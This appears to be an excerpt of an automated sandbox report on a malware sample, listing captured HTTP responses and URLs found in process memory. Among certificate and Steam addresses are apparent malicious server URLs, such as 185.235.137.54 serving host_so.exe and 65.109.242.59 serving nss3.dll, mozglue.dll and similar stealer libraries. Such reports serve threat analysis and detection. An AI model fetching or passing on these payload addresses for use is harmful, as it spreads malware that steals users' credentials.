Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:33:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/
Source: A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/file/host_so.exe
Source: A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/i
Source: A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.235.137.54/n
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2038509404.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 00000002.00000000.2038509404.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 5358.exe, 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000000.2672680740.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, kat2225.tmp.8.dr	String found in binary or memory: http://rpi.net.au/~ajohnson/resourcehacker
Source: explorer.exe, 00000002.00000000.2037923466.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037895946.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2037402622.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007C2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.0000000000809000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: explorer.exe, 00000002.00000000.2042908810.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2042908810.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: kat2225.tmp, kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192617927.000000001B9BD000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: A247.exe, 00000005.00000003.2425574444.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://65.109.242.59
Source: kat2225.tmp, 00000009.00000003.2750844000.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2862103899.000000000084D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/
Source: kat2225.tmp, 00000009.00000003.2985489790.0000000000867000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/42.59ine
Source: kat2225.tmp, 00000009.00000003.2985940074.00000000007D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/?
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/B
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/F
Source: kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/K
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/L
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/O
Source: kat2225.tmp, 00000009.00000003.3023498282.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/P
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/T;
Source: kat2225.tmp, 00000009.00000003.2880856339.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll
Source: kat2225.tmp, 00000009.00000003.2880856339.000000000083C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dll2.59/freebl3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/freebl3.dllZ
Source: kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/l3.dll
Source: kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/mo
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/mozglue.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/mozglue.dllF
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/mozglue.dllr
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/msvcp140.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/msvcp140.dlld
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dll;
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/nss3.dllAppData
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/p
Source: kat2225.tmp, 00000009.00000003.2766326619.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2735078163.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2750844000.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/r
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2719695430.00000000007FF000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985853502.000000000083C000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2704056230.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/s
Source: kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sK
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/so
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dll&
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dllel
Source: kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/softokn3.dllo0
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sqls.dll
Source: kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/sqls.dll)
Source: kat2225.tmp, 00000009.00000003.2880637712.000000000084F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985759378.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/t
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.000000000082E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985489790.0000000000861000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dll?
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dllB
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dllD
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dllO
Source: kat2225.tmp, 00000009.00000003.2985940074.00000000007F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dllSessionKeyBackward
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dllT
Source: kat2225.tmp, 00000009.00000003.2985940074.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/vcruntime140.dllv
Source: kat2225.tmp, 00000009.00000003.2847534612.000000000084D000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848187053.000000000084D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/y
Source: kat2225.tmp, 00000009.00000003.2822767715.000000000084E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59/~;
Source: kat2225.tmp, 00000009.00000002.3157954757.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59CAEH
Source: kat2225.tmp, 00000009.00000002.3157954757.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://65.109.242.59CGII
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.2041938278.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.2038509404.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.2036556348.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000002.00000000.2035970319.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: 76561199689717899[1].htm.9.dr	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000889000.00000004.00000020.00020000.00000000.sdmp, GIIDBG.9.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: kat2225.tmp, 00000009.00000003.2687671916.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: A247.exe, 00000005.00000003.2385990028.0000000002DEB000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386348027.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2386153562.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2848073976.000000000088C000.00000004.00000020.00020000.00000000.sdmp, ECAEGH.9.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
